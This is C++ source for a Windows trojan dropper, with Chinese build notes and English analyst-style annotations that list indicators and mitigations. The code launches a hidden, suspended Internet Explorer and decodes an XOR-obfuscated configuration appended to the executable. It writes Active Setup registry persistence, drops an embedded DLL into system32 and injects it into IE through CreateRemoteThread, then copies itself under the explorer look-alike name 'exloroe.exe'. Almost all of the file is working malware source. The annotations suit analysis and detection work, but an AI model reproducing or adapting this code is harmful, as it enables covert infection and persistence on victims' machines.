// App.cpp : Defines the entry point for the application.
/*
1--插入资源-图标文件
2--添加Script.rc文件到Resource Files
编译-----
一,使用release版而不用debug版编译
使用debug版编译会生成许多垃圾信息.我们先使用默认的设置进行一下编译.可以看到编译后
生成的文件有152k之巨.使用release版编译具体方法是:在"build(编译)--->Configuration(配置)"中
将"Win32 debug"移去,然后再次编译可以发现文件已经小了很多,才24k.但离我们的目标还很远呢.
二,设置自己的入口点函数
C或C++程序默认的入口函数是main()或WinMain(),但我们现在不用什么Main,WinMain.因为这些都不
是直接的入口点,编译器在产生exe文件的时候,将为我们生成真正的入口点.下面我们来定义自己的入口函
数,具体是把main或WinMain改成其它的名字(如MyFun),打开"Project(工程)--->settings(设置)"选项,选
中"link"选项卡,在"Category(分类)"下拉列表中选"output",在" Entry-Point symbol(输入项-点符
号)"中输入我们刚才定义的入口函数(MyFun),在源程序中也要做相应修改,然后再编译.现在是16k了:)
三,优化最小大小
四,输出,入口点该为MyDll--随便改啦
五,连接,/align:40
*/
#include "stdafx.h"
//---------------------------------------------
#include "stdio.h"
#include <stdlib.h>
#include <tlhelp32.h>
#include "Resource.h"
#include "Tiny.h"
// Names of the two artifacts this dropper writes into the system directory
// (see CreateInIFile and CreatServer); both are file-creation indicators.
#define INIFILE "SystemUp.top"
#define SystemUp "SystemUp.dll"
BOOL InjectExplorer();
BOOL EnablePrivilege();
BOOL CreateInIFile();
// Declared but not referenced anywhere else in this file.
char DllPath[MAX_PATH];
// Decoded configuration fields filled by CreateInIFile (URL: 64 bytes, PW: 16 bytes).
char URL[64] = {0};
char PW[16] = {0};
//DWORD WINAPI del(LPVOID lpParam);
// Declared only; the definition that follows is commented out.
ATOM MyRegisterClass(HINSTANCE hInstance);
/*
ATOM MyRegisterClass(HINSTANCE hInstance)
{
WNDCLASSEX wcex;
wcex.hIconSm = LoadIcon(wcex.hInstance, (LPCTSTR)IDI_SMALL);
return RegisterClassEx(&wcex);
}
*/
/*
BOOL GestDir()
{
TCHAR SysPath[MAX_PATH];
GetSystemDirectory(SysPath,MAX_PATH);
//执行自拷贝操作,把自身复制到系统目录下
lstrcat(SysPath,"\\");
lstrcat(SysPath,"SystemUp.dll");
CopyFile("C:\\SystemUp.dll",SysPath,FALSE);
return TRUE;
}
*/
// Persistence helper: copies the running executable into the system directory
// (normally %SystemRoot%\system32) under the explorer.exe look-alike name
// "exloroe.exe", the same path MyApp registers as an Active Setup StubPath.
// Writing there needs an administrative context.
// Returns FALSE if the own path, the system directory, or the copy fails.
BOOL CopySelfToSysdir()
{
// Typo-squatted file name meant to blend in next to explorer.exe; a file IoC.
const TCHAR* fakeExeName = "exloroe.exe";
TCHAR szDestFath[MAX_PATH];
TCHAR szTmp[MAX_PATH]={0};
// Full path of the running executable. sizeof(szTmp) is a byte count, which
// only equals the character count in an ANSI build — the char literals used
// throughout this file suggest that is the case.
if(!GetModuleFileName(NULL,szTmp,sizeof(szTmp)))
{
return FALSE;
}
// System directory path.
if(!GetSystemDirectory(szDestFath,MAX_PATH))
{
return FALSE;
}
// Destination: <system dir>\exloroe.exe. Both lstrcat calls are unbounded and
// rely on MAX_PATH leaving room for the 12 appended characters.
lstrcat(szDestFath,"\\");
lstrcat(szDestFath,fakeExeName);
// bFailIfExists == FALSE: an existing copy is overwritten.
if(!CopyFile(szTmp,szDestFath,FALSE))
{
return FALSE;
}
return TRUE;
}
// Drops the embedded payload: extracts resource IDR_DLL (custom type "Dll")
// from this executable and writes it to <system dir>\SystemUp.dll, the file
// that InjectExplorer later has iexplore.exe load.
// Returns FALSE only when LoadResource fails; see the notes on the other
// error paths below.
BOOL CreatServer()
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize,dwWritten;
HANDLE hFile;
char SystemPath[MAX_PATH] = {0};
// Return value not checked; an empty path would make len == -1 below.
GetSystemDirectory( SystemPath , MAX_PATH );
int len = strlen(SystemPath)-1;
if ( SystemPath[len] != '\\' )
strcat(SystemPath,"\\");
strcat(SystemPath,SystemUp);
// Locate the embedded DLL resource in the dropper's own image.
hResInfo = FindResource(NULL,MAKEINTRESOURCE(IDR_DLL),"Dll");
if(hResInfo == NULL)
{
// Only reports the failure; execution continues with a NULL hResInfo.
MessageBox(NULL,"查询所需的资源","错误",MB_OK);
}
// Size of the resource in bytes.
dwSize = SizeofResource(NULL,hResInfo);
// Map the resource into memory.
hResData = LoadResource(NULL,hResInfo);
if(hResData == NULL)
return FALSE;
// Write the resource bytes to disk; CREATE_ALWAYS overwrites an existing file.
hFile = CreateFile(SystemPath,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
// Re-tests hResData rather than hFile, so a failed CreateFile
// (INVALID_HANDLE_VALUE) is not detected here; WriteFile's result is not
// checked either.
if(hResData == NULL)
return FALSE;
WriteFile(hFile,(LPCVOID)LockResource(hResData),dwSize,&dwWritten,NULL);
CloseHandle(hFile);
return TRUE;
}
/*
int EnableDebugPriv(const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
//打开进程令牌环
if(!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken) )
{
printf("OpenProcessToken error.\n");
return 1;
}
//获得进程本地唯一ID
if(!LookupPrivilegeValue(NULL,name,&luid) )
{
printf("LookupPrivilege error!\n");
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = luid;
//调整权限
if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL) )
{
printf("AdjustTokenPrivileges error!\n");
return 1;
}
return 0;
}*/
/*
BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
{
HANDLE hRemoteProcess;
if(EnableDebugPriv(SE_DEBUG_NAME))
{
printf("add privilege error");
return FALSE;
}
//打开远程线程
if( (hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | //允许远程创建线程
PROCESS_VM_OPERATION | //允许远程VM操作
PROCESS_VM_WRITE,//允许远程VM写
FALSE, dwRemoteProcessId ) )== NULL )
{
printf("OpenProcess error!\n");
return FALSE;
}
char *pszLibFileRemote;
//使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名缓冲区
pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, lstrlen(DllFullPath)+1,
MEM_COMMIT, PAGE_READWRITE);
if(pszLibFileRemote == NULL)
{
printf("VirtualAllocEx error!\n");
return FALSE;
}
//使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间
if( WriteProcessMemory(hRemoteProcess,
pszLibFileRemote, (void *) DllFullPath, lstrlen(DllFullPath)+1, NULL) == 0)
{
printf("WriteProcessMemory error!\n");
return FALSE;
}
//计算LoadLibraryA的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
if(pfnStartAddr == NULL)
{
printf("GetProcAddress error!\n");
return FALSE;
}
//OK,万事俱备,我们通过建立远程线程时的地址pfnStartAddr(实际上就是LoadLibraryA的入口地址)
//和传递的参数pszLibFileRemote(实际上是我们复制过去的木马DLL的全路径文件名)在远程进程内启动我们的木马DLL:
//启动远程线程LoadLibraryA,通过远程线程调用用户的DLL文件
HANDLE hRemoteThread;
if( (hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0,
pfnStartAddr, pszLibFileRemote, 0, NULL) ) == NULL)
{
printf("CreateRemoteThread error!\n");
return FALSE;
}
return TRUE;
}
*/
/*unsigned long getprocid(char *pn)
{
BOOL b;
HANDLE hnd;
PROCESSENTRY32 pe;
hnd=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(pe);
b=Process32First(hnd,&pe);
while(b)
{
if(strcmp(pn,pe.szExeFile)==0)return pe.th32ProcessID;
b=Process32Next(hnd,&pe);
}
return 0;
}
*/
// Decodes the embedded configuration in place: each of the first 500 bytes of
// a is XOR-ed with 1116 (0x45C). The result is stored back into a char, so on
// the usual 8-bit char targets this is effectively XOR with the low byte 0x5C.
// The length is fixed regardless of content; the only caller (CreateInIFile)
// passes a 500-byte buffer of which just the first 104 bytes were initialised.
void jiemistr(char *a)
{
int i;
for(i=0;i<500;i++)
a[i]=a[i]^1116;
}
// On-disk layout of the dropped config file (INIFILE, "SystemUp.top"): the
// struct is written raw with fwrite by CreateInIFile, so the file is exactly
// sizeof(IniInfor) bytes (80 with these two char arrays) — a 64-byte URL field
// followed by a 16-byte password field, both NUL-padded. Presumably read back
// by the injected DLL, which is not part of this file.
typedef struct IniInfor
{
char httpsrc[64];
char pawssword[16];
}IniInfor;
// Recovers the operator configuration appended to the end of this executable
// and writes it to <system dir>\SystemUp.top as a raw IniInfor.
// Expected trailer (last 128 bytes of the file): the marker "configserver"
// followed by XOR-encoded, '$'-separated fields (up to 6), of which field 0
// becomes URL and field 1 becomes PW.
// Returns 1 on success, 0 if the own file cannot be opened, the marker is
// missing, or the config file cannot be created.
BOOL CreateInIFile()
{
FILE *fp;
char *m[6];
char svBuffer[128],strtmp[500];
char *p;
int i = 0;
// Heap buffer for our own path; never delete[]'d, so it leaks on every path.
char *mySelf=new char[256];
IniInfor Ini = {0};
GetModuleFileName(NULL,mySelf,256);
memset(svBuffer,0,128);
// Opened in text mode ("r"); on Windows, fseek/fread over binary content may
// be affected by newline translation and ^Z handling — TODO confirm.
if((fp = fopen(mySelf,"r")) == NULL)
return 0;
// Read the trailing 128 bytes of our own image.
fseek(fp, -128, SEEK_END);
fread(svBuffer, sizeof(char), 128, fp);
fclose(fp);
if(memcmp(svBuffer,"configserver",12)==0)
{
// Strip the 12-byte marker. Source and destination overlap, which strncpy
// does not allow; strlen also stops at the first NUL inside the encoded data.
strncpy(svBuffer,svBuffer+12,strlen(svBuffer)-12);
// Only the first 104 bytes of strtmp are initialised; jiemistr touches 500.
strncpy(strtmp,svBuffer,104);
jiemistr(strtmp);
// Split on '$'. i advances only while another token exists, so with fewer
// than two fields m[1] stays uninitialised for the strcpy below.
p = strtok (strtmp,"$");
while(p)
{
m[i]=p;
if(p = strtok (NULL,"$"))
i++;
if(i==6) break;
}
}
else return 0;
// svBuffer is a stack array, not a heap allocation: passing it to free is
// undefined behaviour and will likely make the CRT abort or corrupt the heap.
free(svBuffer);
// URL is a zero-initialised global, so this memset is a no-op on the first call.
memset( URL, 0, strlen(URL));
// Unbounded copies into URL[64] and PW[16]; an over-long field overflows them.
strcpy( URL, m[0]);
strcpy( PW, m[1]);
memcpy(Ini.httpsrc,URL,strlen(URL));
memcpy(Ini.pawssword,PW,strlen(PW));
char SystemPath[MAX_PATH] = {0};
// Same path construction as CreatServer; return value not checked.
GetSystemDirectory( SystemPath , MAX_PATH );
int len = strlen(SystemPath)-1;
if ( SystemPath[len] != '\\' )
strcat(SystemPath,"\\");
strcat(SystemPath,INIFILE);
// Dropped config file <system dir>\SystemUp.top (file-creation IoC).
FILE* fop = fopen ( SystemPath , "w" );
if ( fop == NULL )
{
printf("\nCreate Inifile false");
return 0;
}
// Written raw, so the file is sizeof(Ini) bytes. "w" is text mode, so a 0x0A
// byte in the data would be expanded to CR LF on Windows.
fwrite(&Ini,sizeof(Ini),1,fop);
fclose(fop);
return 1;
}
//---------------------------------------------------------
// Custom entry point (per the build notes at the top of the file the linker's
// entry symbol is pointed at this function instead of WinMain). Orchestrates
// the dropper: launch a hidden, suspended iexplore.exe as the injection target,
// extract the embedded config, register Active Setup persistence, drop the
// payload DLL, enable SeDebugPrivilege, inject, and copy self to the system
// directory. Always returns 0; no step's result is checked.
// Detection surface, all visible below: an HKLM Active Setup key with a
// malformed GUID name, creation of exloroe.exe / SystemUp.dll / SystemUp.top
// in the system directory, and a remote thread created in iexplore.exe.
// Mitigation note: the HKLM and system-directory writes need administrative
// rights, so a standard-user context limits what this can do.
int APIENTRY MyApp(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
//---------------------------------------
// MyRegisterClass(hInstance);
// CreateThread(NULL,NULL,del,NULL,NULL,NULL);
// Start IE in suspended mode; it becomes the process InjectExplorer looks for.
PROCESS_INFORMATION pi = {0};
STARTUPINFO si = {0};
//------- hidden launch
ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);
// STARTF_USESTDHANDLES is set without filling hStdInput/hStdOutput/hStdError,
// so the child gets NULL standard handles.
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
// Stores a show-window constant in a HANDLE field; CreateProcess overwrites
// pi anyway, so this has no effect.
pi.hProcess = SW_HIDE;
//------
// Hard-coded IE path; the return value is not checked and the suspended
// primary thread is never resumed anywhere in this file.
CreateProcess(
NULL,
"C:\\Program Files\\Internet Explorer\\iexplore.exe",
NULL,
NULL,
0,
CREATE_SUSPENDED,
NULL,
NULL,
&si,
&pi
);
//WinExec("C:\\Program Files\\Internet Explorer\\iexplore.exe -nohome",SW_HIDE);
CreateInIFile();
HKEY hKey;
// Active Setup persistence: Windows runs the StubPath of a component once per
// user at logon. The component name is not a well-formed GUID (wrong group
// lengths, non-hex characters), which by itself makes this key a strong
// indicator. REG_EXPAND_SZ lets %SystemRoot% expand at run time.
TCHAR svExeFile[256] = "%SystemRoot%\\system32\\exloroe.exe";
RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}",&hKey);
// Default value (display name); length passed without the NUL terminator.
RegSetValue(hKey,NULL,REG_SZ,"系统设置",strlen("系统设置"));
// StubPath; the byte count likewise excludes the terminator (lstrlen, not +1).
RegSetValueEx(hKey,"stubpath",0,REG_EXPAND_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
RegCloseKey(hKey);
CreatServer();
//GestDir();
// Results ignored: injection is attempted even if the privilege was not granted.
EnablePrivilege();
InjectExplorer();
/* if ( !EnablePrivilege() )
MessageBox(NULL,"提升权限错误","错误",MB_OK);
if ( InjectExplorer() )
MessageBox(NULL,"程序已经启动","很好",MB_OK);*/
/* DWORD procid;
procid=getprocid("explorer.EXE");/* get the target process PID */
/*
if(procid==0)
return 1;
if( InjectDll("SystemUp.dll",procid) )
{
printf("Inject OK!\n");
}
else
{
printf("Inject Fail!\n");
}*/
// Copies this executable to <system dir>\exloroe.exe, the path registered above.
CopySelfToSysdir();
//DeleteFile("C:\\SystemUp.dll");
//WinExec("exloroe.exe",SW_HIDE);
//---------------------------------------
return 0;
}
/*
DWORD WINAPI del(LPVOID lpParam)
{
RegDeleteKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Active Setup\\Installed Components\\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}");
return TRUE;
}
*/
// DLL injection through LoadLibraryA: finds a process whose image name matches
// iexplore.EXE, allocates a buffer in it, writes the DLL name "SystemUp.dll",
// and starts a remote thread at LoadLibraryA with that buffer as argument.
// The OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
// sequence below is exactly what process-injection detections key on.
// Returns TRUE once the remote thread is created, FALSE on any failure.
BOOL InjectExplorer()
{
HANDLE hSnapshot;
DWORD dwProcessId=0;
PROCESSENTRY32 process32 = { 0 };
// Snapshot of all processes. The documented failure value is
// INVALID_HANDLE_VALUE, while the test below compares against NULL.
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hSnapshot == NULL)
{
printf("CreateToolHelp32Snapshot failed.");
return FALSE;
}
process32.dwSize = sizeof (process32);
BOOL ret = Process32First(hSnapshot,&process32);
while ( ret )
{
// Case-insensitive compare bounded by the candidate's own length, so any
// process whose name is a prefix of "iexplore.EXE" matches, not only the
// full name. Normally picks up the iexplore.exe MyApp started suspended.
if ( !strnicmp( "iexplore.EXE", process32.szExeFile , strlen(process32.szExeFile)) )
{
dwProcessId = process32.th32ProcessID;
// printf("\n%d %s",pID,process32.szExeFile);
break;
}
ret = Process32Next(hSnapshot,&process32);
}
CloseHandle(hSnapshot);
// ret is FALSE only when the list was exhausted without a match.
if ( ret == FALSE )
return FALSE;
/////////////////////////////////////////////////////
// Bare file name: the target's LoadLibraryA resolves it through its DLL search
// path, which includes the system directory where CreatServer dropped it.
char* pszLibFile = "SystemUp.dll";
HANDLE hProcess = NULL;
HANDLE hThread = NULL;
LPTSTR pszLibFileRemote = NULL;
// Access rights needed by the three calls that follow. MyApp calls
// EnablePrivilege first, but ignores its result.
hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |PROCESS_VM_WRITE, FALSE, dwProcessId);
if(hProcess == NULL)
{
fprintf(stderr, "OpenProcess failed. --err: %d\n", GetLastError());
return FALSE;
}
// Byte size of the NUL-terminated DLL name.
int cch = 1 + lstrlen(pszLibFile);
int cb = cch * sizeof(TCHAR);
// Remote buffer for the DLL name; never freed (VirtualFreeEx is commented out).
pszLibFileRemote = (PTSTR)VirtualAllocEx(hProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
if(pszLibFileRemote == NULL)
{
fprintf(stderr, "VirtualAllocEx() failed. --err: %d\n", GetLastError());
return FALSE;
}
// hProcess is leaked on this and every later early return.
if(!WriteProcessMemory(hProcess, pszLibFileRemote, (PVOID)pszLibFile, cb, NULL))
{
fprintf(stderr, "WriteProcessMemory() failed. --err: %d\n", GetLastError());
return FALSE;
}
// Uses the local address of LoadLibraryA as the remote thread's start routine.
PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA");
if(pfnThreadRtn == NULL)
{
fprintf(stderr, "GetProcAddress() failed. --err: %d\n", GetLastError());
return FALSE;
}
// The injection itself: a new thread in the target runs LoadLibraryA("SystemUp.dll").
hThread = CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, pszLibFileRemote, 0, NULL);
if(hThread == NULL)
{
fprintf(stderr, "CreateRemoteThread() failed. --err: %d\n", GetLastError());
return FALSE;
}
// Cleanup is commented out: no wait for completion, and the remote buffer
// and both handles are leaked.
//WaitForSingleObject(hThread, INFINITE);
//VirtualFreeEx(hProcess, pszLibFileRemote, 0, MEM_RELEASE);
//CloseHandle(hThread);
//CloseHandle(hProcess);
//CreateThread(NULL,NULL,del,NULL,NULL,NULL);
return TRUE;
}
// Enables SeDebugPrivilege on the current process token so that OpenProcess in
// InjectExplorer succeeds regardless of the target's security descriptor.
// Only a token that already holds the privilege (normally an administrator's)
// can enable it; otherwise AdjustTokenPrivileges reports ERROR_NOT_ALL_ASSIGNED
// through GetLastError, which the final check catches.
// Returns FALSE if the token cannot be opened, the privilege name cannot be
// resolved, or the adjustment left a non-success error code.
// The token handle is never closed.
BOOL EnablePrivilege()
{
HANDLE hProcessToken = NULL;
// Requests TOKEN_ALL_ACCESS although only ADJUST_PRIVILEGES | QUERY is used.
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hProcessToken))
{
printf("OpenProcessToken() failed. --err: %d\n", GetLastError());
return FALSE;
}
TOKEN_PRIVILEGES tp={0};
LUID luid={0};
// Resolve the LUID of "SeDebugPrivilege" on this system.
if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid))
{
printf("LookupPrivilegeValue error:%d", GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Enable the privilege. The BOOL result is ignored; outcome is read from
// GetLastError on the next line, which AdjustTokenPrivileges sets even when
// it returns TRUE.
AdjustTokenPrivileges(hProcessToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
if(GetLastError() != ERROR_SUCCESS)
{
return FALSE;
}
return TRUE;
}